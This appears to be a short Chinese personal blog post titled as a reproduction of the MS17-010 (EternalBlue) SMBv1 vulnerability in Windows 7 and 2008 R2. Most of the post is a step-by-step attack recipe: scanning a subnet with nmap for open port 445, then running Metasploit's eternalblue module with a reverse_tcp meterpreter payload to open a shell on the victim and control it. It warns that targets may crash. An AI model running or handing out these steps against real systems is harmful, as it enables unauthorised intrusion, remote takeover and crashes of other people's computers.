MS17-010漏洞复现

今天就慢慢开始分享关于我学习的一些东西吧

漏洞原因

如果攻击者向 Microsoft 服务器消息块 1.0(SMBv1)服务器发送经特殊设计的消息,则其中最严重的漏洞可能允许远程代码执行

漏洞影响

Windows7/2008 R2

漏洞复现

首先打开Kali(有些旧版的kali可能没有此模块,那就更新一下吧)

更新Kali的命令:apt-get updata

更新Kali的软件命令:apt-get upgrade

更新Kali的软件包的依赖关系:命令:apt-get dist-upgrade

假如你的ip是:192.168.1.1,你就先在Kali输入nmap -sV 192.168.1.0/24,然后等显示结果,显示结果找有开启445端口的ip,就锁定他

以下攻击命令可能会导致对方电脑蓝屏或者卡死,但是有些电脑卡死一会就会恢复。

msfconsole(启动metasploit)

use exploit/windows/smb/ms17_010_eternalblue(使用漏洞模块)

set payload windows/x64/meterpreter/reverse_tcp(使用payload)

show options(可以查看需要填写的信息)(这里我没演示)

set RHOST(被攻击机ip)

set LHOST(本机ip)

exploit(溢出攻击)

假如反弹了meterpreter命令行可以用meterpreter命令行执行命令控制对方了,也可以在在meterpreter命令行输入shell就可以执行cmd命令行的命令了(两个命令行的指令不一样的哦)

Comments | NOTHING

    空空如也!

消息盒子
# 您需要首次评论以获取消息 #
# 您需要首次评论以获取消息 #

只显示最新10条未读和已读信息